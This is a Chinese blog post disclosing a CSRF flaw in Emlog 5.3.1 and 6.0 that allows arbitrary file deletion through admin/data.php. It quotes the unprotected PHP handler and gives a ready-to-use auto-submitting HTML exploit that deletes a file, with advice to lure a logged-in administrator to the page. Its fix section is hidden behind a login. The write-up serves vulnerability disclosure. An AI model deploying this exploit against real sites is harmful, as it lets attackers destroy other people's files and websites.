Emlog新版一处csrf导致的任意文件删除(可删除全站)

  • 内容
  • 相关
et_highlighter51

听说emlog更新到6.0了,下载了一份最新的代码,发现原来的bug还是没有修复。可能是官方没有在意,所以这里简单叙述一下危害。

出现的地方

admin/data.php139行

if ($action == 'dell_all_bak') {
    if (!isset($_POST['bak'])) {
        emDirect('./data.php?error_a=1');
    } else{
        foreach ($_POST['bak'] as $val) {
            unlink($val);
        }
        emDirect('./data.php?active_del=1');
    }}

可以看到后台是没有验证的,如果管理员访问到了精心构造的界面,则可以删除任意文件,这里代码使用数组循环的,所以管理员如果访问到了页面很可能会删除网站所有。

利用方式

以我本地搭建的网站emlog6.demo为例,构造如下exp:

<html>
  <head>
    
  </head>
  <body>
      <form action="http://emlog6.demo/admin/data.php?action=dell_all_bak" method="POST" id="transfer">
        <input type="hidden" name="bak[0]" value="../robots.txt" />
            <button>aa</button>
      </form>
<script type="text/javascript">
var f = document.getElementById("transfer");
f.submit();
</script>
  </body>
</html>

这里只删除robots.txt。然后将这个上传到任意网址,诱导管理员访问(管理员访问时需要确认已经登陆过后台)
这是访问之前:

Emlog新版一处csrf导致的任意文件删除(可删除全站)

访问之后看到robots.txt已经被删除了

Emlog新版一处csrf导致的任意文件删除(可删除全站)

影响范围

只测试过emlog 5.3.1和6.0 都中招

修复

隐藏资源

资源内容:******,隐藏资源

此资源,你需要登录以后才能查看

你需要注册本站或登录账号以后再来查看内容


  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫

本文标签:

版权声明:若无特殊注明,本文皆为《Mushroom》原创,转载请保留文章出处。

本文链接:Emlog新版一处csrf导致的任意文件删除(可删除全站) - http://www.0xmg.com/post-1608.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
顺序播放